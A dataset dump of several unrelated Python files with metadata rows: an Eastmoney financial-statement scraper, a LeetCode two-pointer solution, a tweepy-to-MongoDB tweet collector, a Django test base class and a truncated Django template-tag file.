sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_quarterly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
东方财富-股票-财务分析-现金流量表-按单季度
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 现金流量表-按单季度
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "2",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "2",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
if __name__ == "__main__":
stock_balance_sheet_by_report_em_df = stock_balance_sheet_by_report_em(
symbol="SH600519"
)
print(stock_balance_sheet_by_report_em_df)
stock_balance_sheet_by_yearly_em_df = stock_balance_sheet_by_yearly_em(
symbol="SH601318"
)
print(stock_balance_sheet_by_yearly_em_df)
stock_profit_sheet_by_report_em_df = stock_profit_sheet_by_report_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_report_em_df)
stock_profit_sheet_by_report_em_df = stock_profit_sheet_by_report_em(
symbol="SZ000001"
)
print(stock_profit_sheet_by_report_em_df)
stock_profit_sheet_by_yearly_em_df = stock_profit_sheet_by_yearly_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_yearly_em_df)
stock_profit_sheet_by_quarterly_em_df = stock_profit_sheet_by_quarterly_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_quarterly_em_df)
stock_cash_flow_sheet_by_report_em_df = stock_cash_flow_sheet_by_report_em(
symbol="SH600519"
)
print(stock_cash_flow_sheet_by_report_em_df)
stock_cash_flow_sheet_by_yearly_em_df = stock_cash_flow_sheet_by_yearly_em(
symbol="SH601398"
)
print(stock_cash_flow_sheet_by_yearly_em_df)
stock_cash_flow_sheet_by_quarterly_em_df = stock_cash_flow_sheet_by_quarterly_em(
symbol="SH601398"
)
print(stock_cash_flow_sheet_by_quarterly_em_df)
| UTF-8 | Python | false | false | 15,845 | py | 21 | stock_three_report_em.py | 20 | 0.616166 | 0.597361 | 0 | 412 | 35.783981 | 107 |
sushku/leetcode-py | 5,411,658,841,195 | 3d1d6935880a9739f6059449538c84554c9af892 | d141d6a9507c864ad335c56070882d4c5bf8b04c | /0011-container-with-most-water.py | a09edce72a035b7b0f92689d31900f4f41486756 | []
| no_license | https://github.com/sushku/leetcode-py | c692d0850c7cc175ae663ddbe6f682fec47dabaf | 997b89c985c1dcf8c4c6e3c607d6b1f0ac730a8b | refs/heads/master | 2021-01-19T02:40:58.322798 | 2017-03-26T06:24:56 | 2017-03-26T06:24:56 | 65,436,658 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def maxArea(self, height):
"""
:type height: List[int]
:rtype: int
"""
i = 0
j = len(height) - 1
max_area = 0
while i < j:
h = min(height[i], height[j])
area = h * (j - i)
max_area = max(area, max_area)
while height[i] <= h and i < j:
i += 1
while height[j] <= h and i < j:
j -= 1
return max_area
s = Solution()
print(s.maxArea([1,2,4,5,3,2]))
| UTF-8 | Python | false | false | 537 | py | 17 | 0011-container-with-most-water.py | 16 | 0.407821 | 0.387337 | 0 | 21 | 24.571429 | 43 |
csesoumita/TwitterDataAnalysis | 7,086,696,086,691 | 9b7edc305a0b8d4f7338797ea0f1f68a68913eef | 33ed6bf1f503e073ad1946216f337ec3caa9e3dd | /REST_API_Twitter.py | d1c90d5e055e495bd3612c9d51091868be18a706 | []
| no_license | https://github.com/csesoumita/TwitterDataAnalysis | f4a10311bdead268aa6b3438edba41453b98c4bc | 776cacc29b199bfa62b9e63dad77c5daa73650b2 | refs/heads/master | 2021-08-17T09:29:07.034056 | 2020-06-22T03:44:42 | 2020-06-22T03:44:42 | 195,810,180 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Program for Twitter Data Crawling via REST API using tweepy Start
import tweepy
from pymongo.mongo_client import MongoClient
class filter_Twitter:
# Accessing the Authentication Keys
API_key=""
API_secret_key = ""
Access_token = ""
Access_token_secret = ""
# Passing objects for Twitter Authentication
auth = tweepy.OAuthHandler(API_key, API_secret_key)
auth.set_access_token(Access_token, Access_token_secret)
api=tweepy.API(auth,wait_on_rate_limit=True)
#Insertion in Local Mongo DB
MONGO_HOST= 'mongodb://localhost/webscience'
client=MongoClient(MONGO_HOST)
db=client.webscience
#Tweets from own twitter account
public_tweets=api.home_timeline()
for tweet in public_tweets:
#db.twitter_search.insert(tweet._json)
print(tweet)
# Displaying own Twitter Details
user= api.me()
print("Name: "+user.name)
print ("Location:"+user.location)
print ("Screen Name:"+user.screen_name)
#Search tweets via specific twiiter user : Narendra Modi
search=api.user_timeline(screen_name='NarendraModi',languages=['en'])
for status in search:
db.twitter_search.insert(status._json)
#Search tweets based on specific hastags
hash_tag='Brexit','weather'
tweet_keyword=api.search(q=hash_tag,languages=['en'])
for keywords in tweet_keyword:
db.twitter_search.insert(keywords._json)
| UTF-8 | Python | false | false | 1,456 | py | 9 | REST_API_Twitter.py | 7 | 0.675824 | 0.675824 | 0 | 40 | 34.25 | 73 |
consaceves/csc210-project | 5,274,219,841,875 | bdc2e80cd37f4a2346c5a19dfee71fe87be77f7b | 2f4640dfec53a65a26d61b17b3684a34552374b2 | /tests/__init__.py | 1a6f474ad2169c94a7d392bda710adcd68c282d5 | []
| no_license | https://github.com/consaceves/csc210-project | e472242cdad81f643c18e471d204048f74de0939 | a199a0759f5939189de73ade60ef2cd4b2a94ae6 | refs/heads/master | 2022-12-11T11:32:03.041038 | 2019-12-11T00:41:12 | 2019-12-11T00:41:12 | 218,378,045 | 0 | 0 | null | false | 2022-12-08T01:50:18 | 2019-10-29T20:31:56 | 2019-12-11T00:41:21 | 2022-12-08T01:50:18 | 5,262 | 0 | 0 | 10 | HTML | false | false | import unittest
from app import create_app, db
class BaseTest(unittest.TestCase):
def create_app(self):
return create_app()
def setUp(self):
self.app = self.create_app()
self.client = self.app.test_client
with self.app.app_context():
from app import models
db.drop_all()
db.create_all()
def tearDown(self):
with self.app.app_context():
from app import models
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 571 | py | 28 | __init__.py | 15 | 0.556918 | 0.556918 | 0 | 26 | 20.961538 | 42 |
sreejithev/pythoncodes | 627,065,248,120 | ab256fb06856c39f20bd0ab6481f67057ca71a48 | 5a4436884af5341ce855c0e84866b972a0f61c05 | /day4/classes/tests/a.py | 9bd7ba8bf794a4dc3d74485131ffd21b4c76d0be | []
| no_license | https://github.com/sreejithev/pythoncodes | 74a420c4f025b893e27f17ba85632a4a096f17fd | 70df14871a9687916d1c4ada76c055607f13e8ce | refs/heads/master | 2021-01-21T20:59:47.056167 | 2017-06-19T09:43:17 | 2017-06-19T09:43:17 | 92,292,259 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | dec = 567
print ("decimal value is",dec)
print (bin(dec),"in binary")
| UTF-8 | Python | false | false | 70 | py | 376 | a.py | 344 | 0.671429 | 0.628571 | 0 | 3 | 22.333333 | 30 |
uktrade/lite-exporter-frontend | 8,839,042,700,040 | dd64151b73b505878895f85493ff5089db3b982c | a402fc7de174d6610063e087ba2f82b658dca5f2 | /end_users/urls.py | 41f3d1f3cd830c88bbd2b064cf20dfbc115197d2 | [
"MIT"
]
| permissive | https://github.com/uktrade/lite-exporter-frontend | bdd8e1c3a40bbc82076f1253cab408974e23632d | cf42ac37a21236486aa303c8935c44a7eba91ef5 | refs/heads/master | 2021-07-15T04:32:22.105366 | 2020-07-24T09:47:31 | 2020-07-24T09:47:31 | 175,791,659 | 3 | 1 | MIT | false | 2020-08-05T10:20:10 | 2019-03-15T09:41:41 | 2020-07-24T09:47:35 | 2020-07-24T10:22:18 | 2,646 | 3 | 1 | 0 | Python | false | false | from django.urls import path
from end_users import views
app_name = "end_users"
urlpatterns = [
path("", views.EndUsersList.as_view(), name="end_users"),
path("<uuid:pk>/", views.EndUserDetailEmpty.as_view(), name="end_user"),
path("<uuid:pk>/copy-advisory/", views.CopyAdvisory.as_view(), name="copy"),
path("apply-for-an-advisory/", views.ApplyForAnAdvisory.as_view(), name="apply"),
path("<uuid:pk>/<str:type>/", views.EndUserDetail.as_view(), name="end_user_detail"),
]
| UTF-8 | Python | false | false | 497 | py | 320 | urls.py | 210 | 0.67002 | 0.67002 | 0 | 13 | 37.230769 | 89 |
judithnat/shoppingList | 15,427,522,530,844 | 289c8a38f78a20c758b5878a624ad02112d3288c | 262308480e2f7052592ee95580be672b54f03a8e | /shoplistapp/urls.py | 274a3f3e989db8753b78801e7ea088b239dafe5b | []
| no_license | https://github.com/judithnat/shoppingList | 9e2d930c6366b41df886623a5211f8be5476c04d | a1ab38c4f5b2bac1abb5fb2f37dccb63ef7cadec | refs/heads/master | 2020-03-24T15:31:04.064567 | 2018-07-29T21:46:08 | 2018-07-29T21:46:08 | 142,792,405 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.ItemList.as_view(), name='shop_list'),
url(r'^item/(?P<pk>\d+)/$', views.item_detail, name='item_detail'),
url(r'^item/new/$', views.ItemCreate.as_view(), name='item_new'),
url(r'^item/(?P<pk>\d+)/edit/$', views.item_edit, name='item_edit'),
]
"""
NB: r' its regex
^ beginning
$end
<pk> assign result of this group to variable name (here pk)
""" | UTF-8 | Python | false | false | 454 | py | 12 | urls.py | 6 | 0.618943 | 0.618943 | 0 | 15 | 29.333333 | 72 |
krakowiakpawel9/live-python | 15,522,011,823,062 | 8fa34951c61966a497c4f2333451009ea35148ae | 1ab52d160b72f4b5bc6776175c1a8aaf3cb86e0a | /fb-posts/02_pathlib/18_pathlib.py | f1196f7066b3aa6b58c5d09aaacf5bcf6207dbec | []
| no_license | https://github.com/krakowiakpawel9/live-python | ea3598ceeafca827b53efdf71a6d3156a6fa25b4 | 237b186b48b51f58450290f5ed0146041e0a1135 | refs/heads/master | 2021-04-17T06:10:53.141136 | 2021-03-06T09:53:47 | 2021-03-06T09:53:47 | 249,418,666 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pathlib import Path
base_dir = Path.cwd() / 'reports'
if not base_dir.is_dir():
base_dir.mkdir()
fnames = [f'{str(i).zfill(2)}_sales.txt' for i in range(1, 13)]
paths = [Path.cwd() / base_dir / f'{fname}' for fname in fnames]
for path in paths:
path.touch()
| UTF-8 | Python | false | false | 276 | py | 70 | 18_pathlib.py | 68 | 0.630435 | 0.615942 | 0 | 11 | 23.909091 | 64 |
elvesmrodrigues/Kcore_Expert_Finding | 7,387,343,788,475 | ff0f2ee460cd14ccfd86536ba89b58dde549d51d | f9efe2ce2325ad3d5d3c5762f3c85e51a2612ea8 | /expert_finding/script/content_embedding.py | 365ace7ec2d69b2eca78c26dd26881e380cbc565 | []
| no_license | https://github.com/elvesmrodrigues/Kcore_Expert_Finding | 3e3347fa77b51d81999fcac12ac9a7324568763e | c03174640f62771492805fb6cbb08f3d2ba6f88f | refs/heads/main | 2023-06-25T03:42:15.155785 | 2021-07-26T12:57:22 | 2021-07-26T12:57:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import expert_finding.script.finding_pipline as expert
import expert_finding.finetuning.network as net_model
import os
current_dir = os.path.dirname(os.path.abspath(__file__))
work_dir = os.path.join(current_dir, "output/data")
def content_embedding_finding():
models = ["tfidf", "GloVe", "sci_bert_nil_sts"]
for model in models:
finder = ExpertFind("V1", work_dir, communities_path, "0", model)
finder.preprocess()
finder.offline_embedding(encoder_name="GloVe")
finder.evalutation(index=True, m=1000, encoder_name=model)
finder = ExpertFind("V2", "/ddisk/lj/DBLP/data/", "/ddisk/lj/triples", "0", "GloVe")
finder.preprocess()
# finder.offline_embedding(encoder_name="GloVe")
finder.evalutation(index=True, k=1000, encoder_name="GloVe")
#
finder = ExpertFind("V3", "/ddisk/lj/DBLP/data/", "/ddisk/lj/triples", "0", "sci_bert_nil_sts")
finder.preprocess()
# finder.offline_embedding(encoder_name="sci_bert_nil_sts")
finder.evalutation(index=True, k=1000, encoder_name="sci_bert_nil_sts")
| UTF-8 | Python | false | false | 1,067 | py | 61 | content_embedding.py | 42 | 0.682287 | 0.665417 | 0 | 25 | 41.68 | 99 |
Aasthaengg/IBMdataset | 2,705,829,421,953 | db028e48eabea08f1691ba7f712dd730e9fdd144 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03167/s904500920.py | 57bd79e056e177c6d9f615c4ea73ddc64ad7fde5 | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
from collections import defaultdict
readline = sys.stdin.buffer.readline
sys.setrecursionlimit(10**8)
def geta(fn=lambda s: s.decode()):
return map(fn, readline().split())
def gete(fn=lambda s: s.decode()):
return fn(readline().rstrip())
def main():
mod = 10**9 + 7
H, W = geta(int)
g = []
for _ in range(H):
g.append(gete())
dp = [[0] * W for _ in range(H)]
for i, gi in enumerate(g):
if i == 0:
w = gi.index("#") if "#" in gi else W
dp[0] = [1 if j < w else 0 for j in range(W)]
else:
for j, gij in enumerate(gi):
if gij == "#":
dp[i][j] = 0
else:
dp[i][j] = (dp[i - 1][j] +
(dp[i][j - 1] if j > 0 else 0)) % mod
print(dp[H - 1][W - 1])
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 898 | py | 202,060 | s904500920.py | 202,055 | 0.447661 | 0.426503 | 0 | 40 | 21.475 | 69 |
CUUATS/geojson-vt-py | 6,279,242,206,438 | aadeeb66ab4ba49a900f49a452b515e2a322516a | 05610a560d95ceec420600e4e001aa6614283a0d | /tests/test_full.py | dbbf0aa2d398d9663623f2c258c5e7b609b02d5d | [
"ISC"
]
| permissive | https://github.com/CUUATS/geojson-vt-py | 301b646ceda9bccf024f66ff962d89378a99a98e | e7b2d68a460679690375a034aae12553fea953dc | refs/heads/master | 2021-10-02T20:41:46.389173 | 2018-11-30T17:03:26 | 2018-11-30T17:03:26 | 119,899,784 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import unittest
from .gen_tiles import genTiles
from .utils import load_json, json_str
class TestFull(unittest.TestCase):
def _tiles_equal(self, inputFile, expectedFile, maxZoom=0,
maxPoints=10000):
tiles = genTiles(load_json(inputFile), maxZoom, maxPoints)
expected = load_json(expectedFile)
self.assertEqual(json_str(tiles), json_str(expected))
def test_tiles_us_states(self):
self._tiles_equal('us-states.json', 'us-states-tiles.json', 7, 200)
def test_tiles_dateline(self):
self._tiles_equal('dateline.json', 'dateline-tiles.json')
def test_tiles_feature(self):
self._tiles_equal('feature.json', 'feature-tiles.json')
def test_tiles_collection(self):
self._tiles_equal('collection.json', 'collection-tiles.json')
def test_tiles_single_geom(self):
self._tiles_equal('single-geom.json', 'single-geom-tiles.json')
def test_invalid_geojson(self):
with self.assertRaises(ValueError) as context:
genTiles({'type': 'Pologon'})
self.assertTrue('not a valid GeoJSON object' in str(context.exception))
def test_empty_geojson(self):
self.assertEqual(json_str(genTiles(load_json('empty.json'))), '{}')
def test_null_geometry(self):
# should ignore features with null geometry
self.assertEqual(json_str(genTiles(
load_json('feature-null-geometry.json'))), '{}')
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 1,499 | py | 20 | test_full.py | 19 | 0.650434 | 0.643763 | 0 | 45 | 32.311111 | 79 |
marcosanchezdenis/laborapp-uc-back | 4,707,284,171,757 | 7e78ae807b5eab53aa2fdd96c0872b2ab988ac61 | 5c23d7c8c2ede17698c7a0111138ec6de7a9d315 | /network/migrations/0003_auto_20190210_1432.py | 9b25b5ec78a5c341aa9654aa3308952142657f35 | []
| no_license | https://github.com/marcosanchezdenis/laborapp-uc-back | 90d9326514292955901e2e90d099b42472da4475 | 0eb2b7843b36cc9666acd675b4badfe715692eee | refs/heads/master | 2020-05-07T21:19:02.759391 | 2019-04-12T00:32:52 | 2019-04-12T00:32:52 | 180,899,633 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.1.5 on 2019-02-10 14:32
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('network', '0002_customer_user'),
]
operations = [
migrations.AddField(
model_name='contacttype',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='contacttype',
name='deleted_at',
field=models.DateTimeField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='contacttype',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='request',
name='message',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='request',
name='requested_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='request',
name='state',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='network.RequestState'),
preserve_default=False,
),
migrations.AddField(
model_name='scoresystemvalue',
name='system',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='network.ScoreSystem'),
preserve_default=False,
),
]
| UTF-8 | Python | false | false | 1,806 | py | 59 | 0003_auto_20190210_1432.py | 59 | 0.581949 | 0.570321 | 0 | 55 | 31.836364 | 119 |
rephus/django-rest-template | 17,428,977,297,311 | 044729e53fb2c4a1b340c76dde51db947d81118c | bfbf35361169bdd0daae677570aab5ef498eb99c | /project/todo/models.py | cfa4bff064905c02e1133f80595e633fabe9d8f4 | []
| no_license | https://github.com/rephus/django-rest-template | 306e29a5108874efcdabd8c38457a79029da7f61 | a088dd426fed3733ed7b1153919545a5cccd997c | refs/heads/master | 2020-04-15T14:42:55.913531 | 2019-01-11T00:56:45 | 2019-01-11T00:56:45 | 164,764,315 | 3 | 8 | null | null | null | null | null | null | null | null | null | null | null | null | null | import uuid
from django.db import models
from django_extensions.db.models import TimeStampedModel
class Task(TimeStampedModel, models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
title = models.CharField(max_length=200)
description = models.CharField(max_length=200, default=None, null=True, blank=True)
completed = models.BooleanField(default=False)
due = models.DateTimeField(default=None, blank=True, null=True)
| UTF-8 | Python | false | false | 476 | py | 12 | models.py | 8 | 0.771008 | 0.756303 | 0 | 11 | 42.272727 | 87 |
simtol/EffectivePython2nd | 19,198,503,821,466 | ddc334e16aea80888c1e77238eedcf958323bd3f | a0bd18d49044bcb38bb8b0f9d5983cad0cf5461a | /master/chapter8/item72.py | 5ea606e27bde285136fc18b7a631f0e26b9edcb3 | []
| no_license | https://github.com/simtol/EffectivePython2nd | 40d14256cbbfcd041427611bfcd54fd521046c3c | 913782212ec0952f59d6ded8566fe797b3ac7978 | refs/heads/main | 2023-03-01T09:21:29.987291 | 2021-02-12T02:06:12 | 2021-02-12T02:06:12 | 338,195,148 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# 아이템 72
#
data = list(range(10**5))
index = data.index(91234)
assert index == 91234
def find_closest(sequence, goal):
for index, value in enumerate(sequence):
if goal < value:
return index
raise ValueError(f'범위를 벗어남: {goal}')
index = find_closest(data, 91234.56)
assert index == 91235
from bisect import bisect_left
index = bisect_left(data, 91234) # 정확히 일치
assert index == 91234
index = bisect_left(data, 91234.56) # 근접한 값과 일치
assert index == 91235
index = bisect_left(data, 91234.23) # 근접한 값과 일치(찾는 값 이상의 값 중 근접한 값을 찾음)
assert index == 91235
import random
import timeit
size = 10 ** 5
iterations = 1000
data = list(range(size))
to_lookup = [random.randint(0, size)
for _ in range(iterations)]
def run_linear(data, to_lookup):
for index in to_lookup:
data.index(index)
def run_bisect(data, to_lookup):
for index in to_lookup:
bisect_left(data, index)
baseline = timeit.timeit(
stmt='run_linear(data, to_lookup)',
globals=globals(),
number=10)
print(f'선형 검색: {baseline:.6f}초')
comparison = timeit.timeit(
stmt='run_bisect(data, to_lookup)',
globals=globals(),
number=10)
print(f'이진 검색: {comparison:.6f}초')
slowdown = 1 + ((baseline - comparison) / comparison)
print(f'선형검색이 {slowdown:.1f}배 더 걸림')
| UTF-8 | Python | false | false | 1,488 | py | 58 | item72.py | 52 | 0.627566 | 0.571114 | 0 | 59 | 21.084746 | 71 |
YirongMao/COSONet | 14,233,521,655,833 | e10aba3ec6524571f8d505584a2c747e28c36302 | 05844d09831bd2b816d9a4b3f3001d04705e601f | /read_utils.py | 075de1f13c0687f9b662d3cd77a09623d90854d3 | []
| no_license | https://github.com/YirongMao/COSONet | 78dba9e9501889d794e97d1b73a658159fc944d6 | 20e92c577ff448588e82c603f4bcc785be90f615 | refs/heads/master | 2020-04-08T04:23:18.762943 | 2018-12-27T07:00:25 | 2018-12-27T07:00:25 | 159,014,162 | 11 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PIL import Image
import PIL
import os
import os.path
import torch.utils.data as data
import numpy as np
import torchvision.transforms as transforms
import time
# input_image_size = 224
webface_train_transforms = transforms.Compose([
transforms.RandomCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5409566, 0.41063643, 0.3478864), (0.27481332, 0.23811759, 0.22841948))
])
def default_loader(path, smaller_side_size=256):
r_img = Image.open(path).convert('RGB')
size = r_img.size
h = size[0]
w = size[1]
if h > w:
scale = smaller_side_size/w
else:
scale = smaller_side_size/h
new_h = round(scale*h)
new_w = round(scale*w)
r_img = r_img.resize((new_h, new_w), PIL.Image.BILINEAR)
return r_img
class ImageFilelist(data.Dataset):
def __init__(self, fname, root_dir=None, transform=None, loader=default_loader, five_crop=False):
self.root_dir = root_dir
self.transform = transform
self.loader = loader
self.five_crop = five_crop
fid = open(fname, 'r')
lines = fid.readlines()
imgs = []
classes = set()
for line in lines:
file, label = line.strip().split(' ')
label = int(label)
item = (file, label)
imgs.append(item)
classes.add(label)
self.imgs = imgs
self.classes = list(classes)
def __getitem__(self, index):
file, label = self.imgs[index]
if self.root_dir is not None:
path = os.path.join(self.root_dir, file)
else:
path = file
if not self.five_crop:
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
label = int(label)
return img, label, path
else:
imgs = self.loader(path)
lst_img = []
for img in imgs:
if self.transform is not None:
img = self.transform(img)
lst_img.append(img)
label = int(label)
return lst_img, label, path
def __len__(self):
return len(self.imgs)
| UTF-8 | Python | false | false | 2,248 | py | 12 | read_utils.py | 10 | 0.564947 | 0.536922 | 0 | 83 | 26.084337 | 101 |
zaheerkhancs/QuantumNeuralNetwork | 13,735,305,460,930 | 9170e311838d86c5c155750a147dbb659def9a53 | 4eeee252acc1a6b55fbb981ed08110047bd3d017 | /data_processor.py | adcfa97b4393d7230c3037db1ce06af7bed21b08 | []
| no_license | https://github.com/zaheerkhancs/QuantumNeuralNetwork | 58e58d044ca4389438ca4c370bb6dbb7760cf392 | ce5654c36d45868cf5a7a53bef460f41e19e6c5d | refs/heads/master | 2022-02-20T22:08:07.618034 | 2019-09-17T04:32:21 | 2019-09-17T04:32:21 | 208,957,603 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""For processing data from https://www.kaggle.com/mlg-ulb/creditcardfraud"""
import csv
import numpy as np
import random
# creditcard.csv downloaded from https://www.kaggle.com/mlg-ulb/creditcardfraud
with open('creditcard.csv', 'r') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
data = list(csv_reader)
data = data[1:]
data_genuine = []
data_fraudulent = []
# Splitting genuine and fraudulent data
for i in range(len(data)):
if int(data[i][30]) == 0:
data_genuine.append([float(i) for i in data[i]])
if int(data[i][30]) == 1:
data_fraudulent.append([float(i) for i in data[i]])
fraudulent_data_points = len(data_fraudulent)
# We want the genuine data points to be 3x the fraudulent ones
undersampling_ratio = 3
genuine_data_points = fraudulent_data_points * undersampling_ratio
random.shuffle(data_genuine)
random.shuffle(data_fraudulent)
# Fraudulent and genuine transactions are split into two datasets for cross validation
data_fraudulent_1 = data_fraudulent[:int(fraudulent_data_points / 2)]
data_fraudulent_2 = data_fraudulent[int(fraudulent_data_points / 2):]
data_genuine_1 = data_genuine[:int(genuine_data_points / 2)]
data_genuine_2 = data_genuine[int(genuine_data_points / 2):genuine_data_points]
data_genuine_remaining = data_genuine[genuine_data_points:]
random.shuffle(data_fraudulent_1)
random.shuffle(data_fraudulent_2)
random.shuffle(data_genuine_1)
random.shuffle(data_genuine_2)
np.savetxt('creditcard_genuine_1.csv', data_genuine_1, delimiter=',')
np.savetxt('creditcard_genuine_2.csv', data_genuine_2, delimiter=',')
np.savetxt('creditcard_fraudulent_1.csv', data_fraudulent_1, delimiter=',')
np.savetxt('creditcard_fraudulent_2.csv', data_fraudulent_2, delimiter=',')
# Larger datasets are used for testing, including genuine transactions unseen in training
np.savetxt('creditcard_combined_1_big.csv', data_fraudulent_1 + data_genuine_1 + data_genuine_remaining, delimiter=',')
np.savetxt('creditcard_combined_2_big.csv', data_fraudulent_2 + data_genuine_2 + data_genuine_remaining, delimiter=',')
| UTF-8 | Python | false | false | 2,675 | py | 5 | data_processor.py | 2 | 0.748037 | 0.731963 | 0 | 66 | 39.530303 | 119 |
mst-solar-car/kicad-bom-generator | 19,653,770,369,592 | c85a270c8bc7c2726c29efd2adc067c938ca2ed9 | cbc5e26bb47ae69e80a3649c90275becf25ce404 | /Formatter/excel_formatter.py | 8f93a89358022a62fa75644c8f7ab99664d2e7da | [
"MIT"
]
| permissive | https://github.com/mst-solar-car/kicad-bom-generator | c3549409c3139f787ad28391372b5cb03791694a | 2aae905056d06f3d25343a8d784049c141d05640 | refs/heads/master | 2021-09-07T14:00:40.759486 | 2018-02-23T23:21:13 | 2018-02-23T23:21:13 | 107,868,801 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import Arguments
import Formatter
import Config
import Logger
from Utils import *
import xlsxwriter
args = Arguments.Parse()
cfg = Config.Get()
@Formatter.Register("xlsx")
def excel_formatter(components):
""" Formats a list of components into an excel spreadsheet """
save_path = args.output_file
workbook = xlsxwriter.Workbook(save_path)
ws = workbook.add_worksheet('BOM')
# Create styling for the header titles
header_style = workbook.add_format({
'font_size': 16,
'bold': True,
'align': 'center',
'bottom': 2,
'right': 1,
})
# Create styling for general row
row_style = workbook.add_format({
'right': 1,
'bottom': 1
})
columns = cfg['columns'] # List of columns
# Add the columns to the file
for col in range(0, len(columns)):
ws.write(0, col, denormalizeStr(columns[col]), header_style)
# Add a row for each component
for row in range(0, len(components)):
for col in range(0, len(columns)):
try:
ws.write(row + 1, col, components[row][columns[col]], row_style)
except:
ws.write(row + 1, col, cfg['emptyValue'], row_style)
# Close the file
workbook.close()
return save_path
| UTF-8 | Python | false | false | 1,200 | py | 42 | excel_formatter.py | 36 | 0.655833 | 0.645833 | 0 | 54 | 21.203704 | 72 |
braskin/pd | 12,927,851,587,101 | 707ded8c96202e033b67a264c2bbe5badf06861e | bbc8fbbdd40665af61fedf69962b38c1d5939683 | /apps/account/templatetags/util_tags.py | 5e479f6c5d6e6ee59165db6a697af2f8568c6308 | []
| no_license | https://github.com/braskin/pd | 64b299ad8058e8d3939bc9778fd1576522f786b0 | df32f96b432c2f07e1a20bcbd84df3eccad5e29a | refs/heads/master | 2021-01-10T22:10:34.318229 | 2013-01-23T11:50:37 | 2013-01-23T11:50:37 | 7,773,119 | 0 | 1 | null | false | 2020-07-25T19:53:06 | 2013-01-23T11:09:43 | 2013-10-11T06:04:48 | 2013-01-23T11:52:07 | 7,088 | 0 | 1 | 1 | Python | false | false | from django import template
from django.conf import settings
from mydebug import *
register = template.Library()
@register.filter
def key(d, key_name):
try:
value = d[key_name]
except KeyError:
value = ''
return value
key = register.filter('key', key)
def raw(parser, token):
